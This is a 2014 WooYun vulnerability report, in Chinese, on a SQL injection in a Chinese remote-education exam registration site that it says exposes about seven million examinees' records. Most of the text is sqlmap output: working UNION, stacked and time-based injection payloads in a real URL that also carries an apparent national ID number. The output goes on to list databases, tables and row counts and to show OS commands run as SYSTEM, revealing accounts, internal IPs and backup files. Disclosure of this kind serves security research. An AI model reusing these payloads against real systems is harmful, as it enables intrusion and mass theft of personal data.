当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079652

漏洞标题:远程教育#国考某漏洞致七百万考生信息泄露

相关厂商:中国现代远程与继续教育网

漏洞作者: 路人甲

提交时间:2014-10-17 10:55

修复时间:2014-12-01 10:56

公开时间:2014-12-01 10:56

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

...

详细说明:

http://server1.cdce.cn
昨晚妹子要看考试,顺便看了下,吓着了~ 涉及数据量大,今天有时间赶紧提交
点:
http://server1.cdce.cn/student/login/RegisterAppeal.aspx?studentnumber=13208110129051&CrtificateNumber=430527199110124249&NetSchoolID=49
唯一的注入点
权限有多大呢? 看看
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: studentnumber
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: studentnumber=-8646' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(101)+CHAR(120)+CHAR(116)+CHAR(113)+CHAR(75)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(98)+CHAR(121)+CHAR(67)+CHAR(113)+CHAR(102)+CHAR(118)+CHAR(117)+CHAR(113),NULL,NULL-- &CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: studentnumber=13208110129051'; WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: studentnumber=13208110129051' WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: studentnumber
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: studentnumber=-8646' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(101)+CHAR(120)+CHAR(116)+CHAR(113)+CHAR(75)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(98)+CHAR(121)+CHAR(67)+CHAR(113)+CHAR(102)+CHAR(118)+CHAR(117)+CHAR(113),NULL,NULL-- &CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: studentnumber=13208110129051'; WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: studentnumber=13208110129051' WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [24]:
[*] aaaaaaaaa
[*] AdventureWorksDW
[*] Articles
[*] CCETS
[*] CetProp
[*] CetSite
[*] EntrolExam
[*] i_exchange_1409
[*] i_exchange_141
[*] i_exchange_142
[*] i_exchange_143
[*] i_exchange_144
[*] master
[*] MasterSchool
[*] model
[*] msdb
[*] OASystem
[*] ReportServer
[*] ReportServerTempDB
[*] SiteArrange
[*] SunRecruit
[*] tempdb
[*] TrainingDB
[*] WEBEIMS20140609
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: studentnumber
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: studentnumber=-8646' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(101)+CHAR(120)+CHAR(116)+CHAR(113)+CHAR(75)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(98)+CHAR(121)+CHAR(67)+CHAR(113)+CHAR(102)+CHAR(118)+CHAR(117)+CHAR(113),NULL,NULL-- &CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: studentnumber=13208110129051'; WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: studentnumber=13208110129051' WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'WEBEIMS'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: studentnumber
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: studentnumber=-8646' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(101)+CHAR(120)+CHAR(116)+CHAR(113)+CHAR(75)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(98)+CHAR(121)+CHAR(67)+CHAR(113)+CHAR(102)+CHAR(118)+CHAR(117)+CHAR(113),NULL,NULL-- &CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: studentnumber=13208110129051'; WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: studentnumber=13208110129051' WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: WEBEIMS
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| dbo.logInfo | 34837660 |
| dbo.signUpArrangeHistory | 28216209 |
| dbo.signUpArrangeHistory | 28216209 |
| dbo.HistorySignUpInfo | 15718901 |
| dbo.HistoryLoginfo | 13400141 |
| dbo.HistorysignUpFee | 11956226 |
| dbo.mktgl | 8898216 |
| dbo.View_Studentinfo | 6480617 |
| dbo.studentInfoOther | 6479757 |
| dbo.temp_studentinfootherBACK2014_10_13 | 6203286 |
| dbo.temp_studentinfoBACK2014_10_13 | 6203280 |
| dbo.temp_studentinfoBACK2014_10_13 | 6203280 |
| dbo.sequenceLock | 3715945 |
| dbo.userRegister | 3705693 |
| dbo.HistoryExportPayBill | 3590809 |
| dbo.HistoryFeePaymentOrderSuccess | 3590375 |
| dbo.StudentInfoCode | 3211656 |
| dbo.AllPassScore | 3169763 |
| dbo.ALLTKPassStudent | 2980061 |
| dbo.batchPayment | 2877382 |
| dbo.junction | 2594172 |
| dbo.StudentToBase | 1932885 |
| dbo.HistoryBatchPayment | 1884599 |
| dbo.studentPhotoImport | 1730868 |
| dbo.lwstudent | 1659610 |
| dbo.temp_xx201409 | 1416940 |
| dbo.HistoryPaymentLogSuccess | 1213435 |
| dbo.HistoryPaymentLog | 1115304 |
| dbo.HistoryExamSubject2SignUpInfo20130301 | 1097509 |
| dbo.HistoryExamSubject2SignUpInfo20130301 | 1097509 |
| dbo.HistoryPayBill | 1075803 |
| dbo.singUserLogInfo | 858505 |
| dbo.examSubject2SignUpInfo_20140922 | 746280 |
| dbo.examSubject2SignUpInfo_20140922 | 746280 |
| dbo.examSubject2SignUpInfo_20140922 | 746280 |
| dbo.signUpInfo_20140922 | 746280 |
| dbo.signUpInfo_20140922 | 746280 |
| dbo.currentExamScore20141009Temp | 727792 |
| dbo.ExamScore20140922 | 727792 |
| dbo.ExamScore20141009 | 727792 |
| dbo.i_ExamRoom_CE_Arrange | 727792 |
| dbo.i_ExamRoom_CE_Arrange | 727792 |
| dbo.HistorySignUpFeeSuggestions | 631650 |
| dbo.Bak_MulUsertLogInfo | 615294 |
| dbo.ExamScorePublic_Old | 566295 |
| dbo.ExamScorePublic_Old | 566295 |
| dbo.currentExamScore20140514Temp | 548815 |
| dbo.currentExamScore20140514Temp | 548815 |
| dbo.examScore20140514 | 548815 |
| dbo.examScore20140514 | 548815 |
| dbo.HistoryFeePaymentOrder | 507178 |
| dbo.[ExamScorePublic2010-12_old] | 496194 |
| dbo.TnineScore | 415029 |
| dbo.temp_1409newst | 414225 |
| dbo.temp_1409newst | 414225 |
| dbo.ProvinceSignUpReason | 408748 |
| dbo.signUpFeeSuggestions | 352847 |
| dbo.userInfoAppeal | 309803 |
| dbo.lxtxsb | 308052 |
| dbo.dd1314 | 307442 |
| dbo.HistoryBatchPaymentSuggestions | 240947 |
| dbo.Studentinfo_Triggerold | 212378 |
| dbo.Studentinfo_Triggerold | 212378 |
| dbo.Studentinfo_Triggerold | 212378 |
| dbo.TKTJ10151543 | 208633 |
| dbo.AlltkbsDrop_Trigger | 198739 |
| dbo.AlltkbsDrop_Trigger | 198739 |
| dbo.AlltkbsDrop_Trigger | 198739 |
| dbo.paymentLog | 185549 |
| dbo.payBill | 185283 |
| dbo.paymentLogSuccess | 185221 |
| dbo.temp_DD1409newst | 137201 |
| dbo.temp_wxx201409 | 125467 |
| dbo.batchPaymentSuggestions | 111512 |
| dbo.signupfreebirstu | 109786 |
| dbo.StudentInfoImport | 75547 |
| dbo.mulUserLogInfo | 45848 |
| dbo.inPutInfo | 41862 |
| dbo.TimeBatchPayment | 34721 |
| dbo.NoSignUpTemp_Temp | 30884 |
| dbo.NoSignUpTemp_Temp | 30884 |
| dbo.orgInfo | 27225 |
| dbo.temp_orgInfoBACK2014_10_13 | 26418 |
| dbo.temp_StudycenterProvince | 25718 |
| dbo.studycenter | 25717 |
| dbo.temp_studycenterBACK2014_10_13 | 24903 |
| dbo.yidi1 | 22054 |
| dbo.YIDISignUpStudent | 21863 |
| dbo.studentModiOld | 18946 |
| dbo.studentModiOld | 18946 |
| dbo.shengyang | 18279 |
| dbo.ltftemp | 17836 |
| dbo.i_ExamRoom_WE_Arrange | 17159 |
| dbo.i_ExamRoom_WE_Arrange | 17159 |
| dbo.signupfreewrong | 17076 |
| dbo.Temp_Kuasheng | 12496 |
| dbo.CheatScore | 12446 |
| dbo.examscore333 | 12331 |
| dbo.nophoto | 12305 |
| dbo.TKTJ91913 | 11878 |
| dbo.TKTJ6101045 | 11343 |
| dbo.temp_YIDISignUpStudent | 10416 |
| dbo.NoSignBatch | 10379 |
| dbo.havepic | 8050 |
| dbo.temp_xxupstxz | 7177 |
| dbo.yidi2 | 6560 |
| dbo.TJSignUpFree | 6158 |
| dbo.TKTJ731125 | 5733 |
| dbo.TKTJ7111532 | 5439 |
| dbo.TKTJ7251531 | 5187 |
| dbo.VoteStudentExamSite | 4045 |
| dbo.VoteStudentExamSite | 4045 |
| dbo.temp_getvote | 3600 |
| dbo.SignUpFree_Trigger | 3461 |
| dbo.SignUpFree_Trigger | 3461 |
| dbo.TKTJ74164 | 3074 |
| dbo.temp_HistorySignUpInfo | 2980 |
| dbo.signupfreewrongstudent | 2395 |
| dbo.CheatFive | 1818 |
| dbo.TKTJ7181639 | 1608 |
| dbo.HistoryBackfund | 1367 |
| dbo.backPayBill | 1364 |
| dbo.aa | 1156 |
| dbo.specialtyInfo | 1129 |
| dbo.TKTJ7161543 | 1123 |
| dbo.diandashuju | 1088 |
| dbo.temp_examscore238 | 1078 |
| dbo.fpos | 1056 |
| dbo.examSiteInfo | 851 |
| dbo.examSiteInfo | 851 |
| dbo.NetSchoolDDtoExamSite | 822 |
| dbo.i_ExamSite | 708 |
| dbo.View_i_ExamSite | 708 |
| dbo.TKTJ9261454 | 677 |
| dbo.TKTJ627141 | 510 |
| dbo.temp_WY1409newstkshdou | 491 |
| dbo.temp_WY1409newstkshdou | 491 |
| dbo.TKTJ9101356 | 478 |
| dbo.areaCity | 471 |
| dbo.TKTJ9231424 | 468 |
| dbo.i_Lcenter | 464 |
| dbo.examSequenceInfo | 459 |
| dbo.PassSignup | 434 |
| dbo.TKTJ7141124 | 424 |
| dbo.TKTJ7141647 | 398 |
| dbo.Expired_MaxYear | 397 |
| dbo.Student_MaxYear | 338 |
| dbo.notStudent_MaxYear | 333 |
| dbo.temp_md1012 | 314 |
| dbo.PicStudent | 294 |
| dbo.yidi3 | 245 |
| dbo.XMLPayBill | 240 |
| dbo.BackReFundEx20130305 | 238 |
| dbo.BackReFundEx20130305 | 238 |
| dbo.temp_xxupstzjhm | 189 |
| dbo.TKTJ741651 | 189 |
| dbo.sichuang22 | 183 |
| dbo.sichuang22 | 183 |
| dbo.examScoreLine | 179 |
| dbo.TKTJ94153 | 178 |
| dbo.Menu2Org | 172 |
| dbo.sichuang11 | 159 |
| dbo.sichuang11 | 159 |
| dbo.TKTJ7141349 | 145 |
| dbo.OrgTreeMenu | 119 |
| dbo.temp_yd | 116 |
| dbo.queryNetSchool | 113 |
| dbo.temp_CheckPayBill | 100 |
| dbo.TKTJ92933 | 95 |
| dbo.i_ExamSignUp | 91 |
| dbo.baseInfo | 87 |
| dbo.yushu20120516 | 82 |
| dbo.VoteOptions | 80 |
| dbo.HistoryXmlPayBill | 78 |
| dbo.temp_1409newstxnjd77 | 77 |
| dbo.nationInfo | 59 |
| dbo.samenessSubject | 53 |
| dbo.BigExamArea | 50 |
| dbo.View_BigExamarea | 50 |
| dbo.i_Tvu_Province | 46 |
| dbo.NetSchoolDD | 46 |
| dbo.NetSchoolDD | 46 |
| dbo.NewStudycenter | 42 |
| dbo.dws | 40 |
| dbo.areaProvince | 34 |
| dbo.examArea | 31 |
| dbo.unifyExamInfo | 28 |
| dbo.gradeIssue | 27 |
| dbo.Notice | 27 |
| dbo.hada | 24 |
| dbo.i_ExamSequence | 20 |
| dbo.Temp_Sign | 18 |
| dbo.v_CaptureInfo1 | 18 |
| dbo.vw1_ExamSiteStuInfo_add | 18 |
| dbo.TKTJ9261656 | 17 |
| dbo.VoteSubject | 17 |
| dbo.signUpFee | 16 |
| dbo.FeePaymentOrder | 11 |
| dbo.OrgGrade | 10 |
| dbo.i_ExamSubject | 8 |
| dbo.temp_WY1409newstxhdou | 8 |
| dbo.View_DisTBigExamArea | 8 |
| dbo.FeePaymentOrderSuccess | 7 |
| dbo.netExamOffice | 6 |
| dbo.i_University | 5 |
| dbo.TKTJ7141429 | 4 |
| dbo.temp_xxupstorerr | 2 |
| dbo.temp_xxupstorerr | 2 |
| dbo.TKPassTable | 1 |
+-------------------------------------------+---------+
目测数据近700W.
居然还直接可执行命令:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: studentnumber
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: studentnumber=-8646' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(101)+CHAR(120)+CHAR(116)+CHAR(113)+CHAR(75)+CHAR(108)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(98)+CHAR(121)+CHAR(67)+CHAR(113)+CHAR(102)+CHAR(118)+CHAR(117)+CHAR(113),NULL,NULL-- &CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: studentnumber=13208110129051'; WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: studentnumber=13208110129051' WAITFOR DELAY '0:0:5'--&CrtificateNumber=430527199110124249&NetSchoolID=49
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
command standard output [1]:
[*] nt authority\system
command standard output:
---
\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_X3650-SQL2005 IWAM_X3650-SQL2005 sqluser
sshd sshd_admin SUPPORT_388945a0
---
command standard output:
---
Windows IP Configuration
Host Name . . . . . . . . . . . . : X3650-SQL2005
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接(内):
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
Physical Address. . . . . . . . . : E4-1F-13-63-E2-52
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.231
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
DNS Servers . . . . . . . . . . . : 202.106.0.20
---
command standard output:
---
驱动器 C 中的卷没有标签。
卷的序列号是 B897-8430

C:\WINDOWS\system32 的目录

2014-10-10 14:24 <DIR> .
2014-10-10 14:24 <DIR> ..
2010-07-12 11:05 3,314 $winnt$.inf
2010-07-12 18:49 <DIR> 1025
2010-07-12 18:49 <DIR> 1028
2010-07-12 18:49 <DIR> 1031
2010-07-12 18:49 <DIR> 1033
2010-07-12 18:49 <DIR> 1037
2010-07-12 18:49 <DIR> 1041
2010-07-12 18:49 <DIR> 1042
2010-07-12 18:49 <DIR> 1054
2003-03-27 20:00 2,151 12520437.cpx
2003-03-27 20:00 2,233 12520850.cpx
2010-08-15 17:31 <DIR> 2052
2010-07-12 18:49 <DIR> 3076
2010-07-12 18:49 <DIR> 3com_dmi
2010-02-12 12:45 100,352 6to4svc.dll
2003-03-27 20:00 1,460 a15.tbl
2003-03-27 20:00 44,370 a234.tbl
2007-02-17 06:58 39,936 aaaamon.dll
2007-02-17 06:58 64,512 access.cpl
2007-03-07 20:00 14,032 accserv.mib
2003-03-27 20:00 44,544 acctres.dll
2007-02-17 06:58 172,032 accwiz.exe
2003-03-27 20:00 61,952 acelpdec.ax
2007-02-17 06:58 122,880 acledit.dll
2007-02-17 06:58 100,352 aclui.dll
2003-03-27 20:00 44,370 acode.tbl
2007-02-17 06:58 198,656 activeds.dll
2003-03-27 20:00 111,616 activeds.tlb
2007-02-17 06:42 4,608 actmovie.exe
2007-02-17 06:42 98,816 actxprxy.dll
2010-07-12 18:49 <DIR> administration
2007-02-17 23:54 15,071,744 adminpak.msi
2007-02-17 06:58 57,344 admparse.dll
2007-03-07 20:00 48,128 admwprox.dll
2007-02-17 06:58 686,592 adprop.dll
2007-02-17 06:42 28,672 adptif.dll
2007-02-17 06:42 178,688 adsldp.dll
2007-02-17 06:42 153,088 adsldpc.dll
2007-02-17 06:42 69,632 adsmsext.dll
2007-02-17 06:58 176,640 adsnds.dll
2007-02-17 06:58 277,504 adsnt.dll
2007-02-17 06:42 123,904 adsnw.dll
2007-02-17 06:58 685,056 advapi32.dll
2007-02-17 06:58 96,768 advpack.dll
2007-02-17 06:42 26,624 aelupsvc.dll
2007-02-17 06:58 41,472 ahui.exe
2007-02-17 06:42 45,056 alg.exe
2007-02-17 06:42 18,944 alrsvc.dll
2010-07-12 11:02 16,832 amcompat.tlb
2007-02-17 06:42 72,704 amstream.dll
2003-03-27 20:00 9,143 ansi.sys
2007-02-17 06:42 113,152 apcups.dll
2003-03-27 20:00 12,498 append.exe
2007-02-17 06:58 148,992 apphelp.dll
2010-08-13 11:55 <DIR> appmgmt
2007-02-17 06:58 153,600 appmgmts.dll
2007-02-17 06:58 284,160 appmgr.dll
2007-02-17 06:59 467,968 appwiz.cpl
2007-02-17 06:42 20,992 arp.exe
2003-03-27 20:00 110,566 arphr.tbl
2003-03-27 20:00 16,312 arptr.tbl
2003-03-27 20:00 146,126 array30.tab
2003-03-27 20:00 18,600 arrayhw.tab
2003-03-27 20:00 88,576 asctrls.ocx
2007-02-17 06:59 5,120 asferror.dll
2007-03-07 20:00 21,504 aspperf.dll
2007-02-17 06:59 28,672 asr_fmt.exe
2007-02-17 06:59 22,016 asr_ldm.exe
2007-02-17 06:42 33,280 asr_pfu.exe
2010-03-06 12:49 65,536 asycfilt.dll
2007-02-17 06:59 29,184 at.exe
2003-03-27 20:00 11,264 atkctrs.dll
2009-07-18 02:47 62,976 atl.dll
2003-03-18 20:05 89,088 atl71.dll
2007-02-17 06:59 14,336 atmadm.exe
2012-12-16 20:24 287,232 atmfd.dll
2007-02-17 06:42 30,720 atmlib.dll
2007-02-17 06:42 39,936 atmpvcno.dll
2003-03-27 20:00 11,776 atrace.dll
2003-03-27 20:00 11,776 attrib.exe
2007-02-17 06:59 473,088 audiodev.dll
2007-02-17 06:42 41,472 audiosrv.dll
2007-02-17 06:42 14,336 auditusr.exe
2007-03-07 20:00 15,032 authserv.mib
2007-02-17 06:42 70,656 authz.dll
2007-02-17 23:54 594,944 autochk.exe
2007-02-17 06:42 608,256 autoconv.exe
2003-03-27 20:00 60,416 autodisc.dll
2003-03-27 20:00 1,688 AUTOEXEC.NT
2007-02-17 23:54 586,752 autofmt.exe
2003-03-27 20:00 10,240 autolfn.exe
2003-03-27 20:00 69,584 avicap.dll
2007-02-17 06:59 65,024 avicap32.dll
2009-11-26 22:46 86,016 avifil32.dll
2003-03-27 20:00 109,456 avifile.dll
2007-03-07 20:00 2,114 axctrnm.h
2007-03-07 20:00 14,629 axperf.ini
2003-03-27 20:00 41,587 azman.msc
2007-02-17 06:42 6,144 azrlreg.exe
2007-02-17 06:42 233,472 azroles.dll
2007-02-17 06:59 307,712 azroleui.dll
2007-02-17 06:42 52,736 basesrv.dll
2007-02-17 06:59 31,232 batmeter.dll
2007-02-17 06:42 8,704 batt.dll
2003-03-27 20:00 15,872 bidispl.dll
2003-03-27 20:00 66,728 big5.nls
2003-03-27 20:00 28,420 bios1.rom
2003-03-27 20:00 8,191 bios4.rom
2007-02-17 06:42 8,192 bitsprx2.dll
2007-02-17 06:42 7,168 bitsprx3.dll
2007-02-17 06:42 285,696 blackbox.dll
2007-02-17 06:59 210,944 bootcfg.exe
2003-03-27 20:00 13,312 bootvid.dll
2003-03-27 20:00 82,172 bopomofo.nls
2003-03-27 20:00 22,984 bopomofo.uce
2003-03-27 20:00 50,688 browselc.dll
2012-06-30 00:13 78,336 browser.dll
2013-05-17 07:06 1,033,216 browseui.dll
2007-02-17 06:42 80,896 browsewm.dll
2003-03-27 20:00 12,800 btpagnt.dll
2009-08-11 01:46 38,400 bxndcox.dll
2007-02-17 23:55 88,576 cabinet.dll
2010-01-13 22:43 84,992 cabview.dll
2010-08-13 10:45 <DIR> Cache
2007-02-17 06:59 27,136 cacls.exe
2003-03-27 20:00 114,688 calc.exe
2007-02-17 06:59 51,712 camocx.dll
2007-02-17 06:59 95,232 capesnpn.dll
2006-09-09 12:29 466,944 capicom.dll
2003-03-27 20:00 360,960 cards.dll
2012-11-08 20:20 <DIR> CatRoot
2014-03-28 21:30 <DIR> CatRoot2
2007-02-17 06:42 272,896 catsrv.dll
2007-02-17 06:42 20,480 catsrvps.dll
2007-02-17 06:42 616,448 catsrvut.dll
2007-03-14 19:50 34,552 cba.dll
2003-03-27 20:00 46,592 ccfapi32.dll
2003-03-27 20:00 29,696 ccfgnt.dll
2007-02-17 06:42 57,856 cd2chain.exe
2007-02-17 06:59 150,528 cdfview.dll
2012-06-02 15:19 97,304 cdm.dll
2007-02-17 06:42 2,098,688 cdosys.dll
2007-02-17 06:59 89,088 certadm.dll
2007-02-17 06:59 225,280 certcli.dll
2007-02-17 06:59 453,120 certmgr.dll
2003-03-27 20:00 26,632 certmgr.msc
2007-02-17 06:59 432,640 certmmc.dll
2007-02-17 06:59 115,200 certpdef.dll
2007-02-17 06:59 135,168 certreq.exe
2010-07-12 11:04 <DIR> certsrv
2003-03-27 20:00 42,980 certsrv.msc
2007-02-17 06:59 239,104 certtmpl.dll
2003-03-27 20:00 41,951 certtmpl.msc
2007-02-17 06:59 648,192 certutil.exe
2007-02-17 06:59 64,512 certxds.dll
2007-02-17 06:42 222,720 cewmdm.dll
2007-02-17 06:59 44,032 cfgbkend.dll
2003-03-27 20:00 17,920 cfgmgr32.dll
2007-02-17 06:47 78,848 chajei.ime
2007-02-17 06:59 11,776 change.exe
2007-02-17 06:59 84,480 charmap.exe
2003-03-27 20:00 7,680 chcp.com
2007-02-17 06:59 17,408 chglogon.exe
2007-02-17 06:59 19,456 chgport.exe
2007-02-17 06:59 17,408 chgusr.exe
2007-02-17 06:42 13,824 chkdsk.exe
2003-03-27 20:00 12,288 chkntfs.exe
2003-03-27 20:00 41,472 choice.exe
2007-02-17 06:47 1,682,432 ChsBrKr.dll
---
command standard output:
---
驱动器 D 中的卷没有标签。
卷的序列号是 944A-8041

D:\ 的目录

2014-07-04 16:11 516,096 2.mdb
2014-05-14 13:52 <DIR> 201404
2014-10-14 14:47 <DIR> 201409
2014-10-15 15:55 <DIR> 201412
2013-11-15 15:27 <DIR> 231_DB
2012-09-24 17:19 <DIR> 241_DB_backup
2014-07-03 17:44 <DIR> 241_DB_bak
2013-08-13 18:02 <DIR> 360Downloads
2013-11-06 17:07 <DIR> ArrangeExamRoom--准考证生成工具
2014-03-10 17:51 258,684 ArrangeExamRoom--准考证生成工具.rar
2002-02-08 22:47 1,999,360 Articles20111128.bak
2002-02-09 16:26 190,818 Articles20111128.rar
2011-12-09 10:48 <DIR> backup
2014-04-19 17:55 245,366,784 CetSite.mdf
2014-04-19 17:55 2,677,604,352 CetSite_log.ldf
2012-09-29 16:01 <DIR> Chuanda_DB
2011-12-09 10:49 <DIR> cwRsync
2012-09-25 09:59 3,547,252 cwRsyncServer_4.0.5_Installer.zip
2014-10-11 10:14 <DIR> DBBackup
2014-09-01 09:21 <DIR> duizhangdan
2012-09-25 11:52 <DIR> ICW
2014-09-26 18:05 169,017,344 i_exchange.mdf
2014-09-26 18:05 1,050,607,616 i_exchange_log.LDF
2012-09-25 10:06 <DIR> Program Files
2013-10-15 17:52 14,753,792 student.mdb
2014-07-03 18:11 <DIR> temp
---
command standard output:
---
驱动器 E 中的卷没有标签。
卷的序列号是 9827-D7D0

E:\ 的目录

2014-04-21 08:12 <DIR> DB_Backup
2014-01-14 11:29 2,704,896 i_exchange_141_ExamPlan_20140114112929.bak
2014-10-15 12:43 <DIR> MS
2014-10-10 14:24 <DIR> Program Files
2014-10-13 17:49 <DIR> temp
---
command standard output:
---
驱动器 E 中的卷没有标签。
卷的序列号是 9827-D7D0

e:\MS 的目录

2014-10-15 12:43 <DIR> .
2014-10-15 12:43 <DIR> ..
2014-07-21 11:42 2,952 photo核对.sql
2014-09-12 14:24 64,975 zs统考语句(请勿修改).sql
2014-03-07 11:53 13,768 zs统考语句2(请勿修改).sql
2012-07-04 12:18 3,552 对接数量.sql
2014-03-05 14:30 1,281 对接规范.sql
2014-07-07 16:02 1,588 异地报表统计.sql
2011-08-08 10:58 2,006 技巧.sql
2014-10-15 12:43 20,212 新增电大新生与免考.sql
2014-10-13 11:14 11,052 新添学习中心.sql
2012-01-14 17:37 16,576 每次考试后统计.sql
2012-01-14 16:05 16,611 每次考试后统计(旧电大模式).sql
2014-06-06 18:03 1,555 索引碎片整理.sql
2011-01-28 16:53 12,563 统考综合统计(旧电大模式).sql
2011-01-28 16:53 12,563 统考综合统计.sql
2014-06-09 17:58 15,542 统考通过标识.sql
---
command standard output:
---
驱动器 D 中的卷没有标签。
卷的序列号是 944A-8041

D:\ 的目录

2014-07-04 16:11 516,096 2.mdb
2014-05-14 13:52 <DIR> 201404
2014-10-14 14:47 <DIR> 201409
2014-10-15 15:55 <DIR> 201412
2013-11-15 15:27 <DIR> 231_DB
2012-09-24 17:19 <DIR> 241_DB_backup
2014-07-03 17:44 <DIR> 241_DB_bak
2013-08-13 18:02 <DIR> 360Downloads
2013-11-06 17:07 <DIR> ArrangeExamRoom--准考证生成工具
2014-03-10 17:51 258,684 ArrangeExamRoom--准考证生成工具.rar
2002-02-08 22:47 1,999,360 Articles20111128.bak
2002-02-09 16:26 190,818 Articles20111128.rar
2011-12-09 10:48 <DIR> backup
2014-04-19 17:55 245,366,784 CetSite.mdf
2014-04-19 17:55 2,677,604,352 CetSite_log.ldf
2012-09-29 16:01 <DIR> Chuanda_DB
2011-12-09 10:49 <DIR> cwRsync
2012-09-25 09:59 3,547,252 cwRsyncServer_4.0.5_Installer.zip
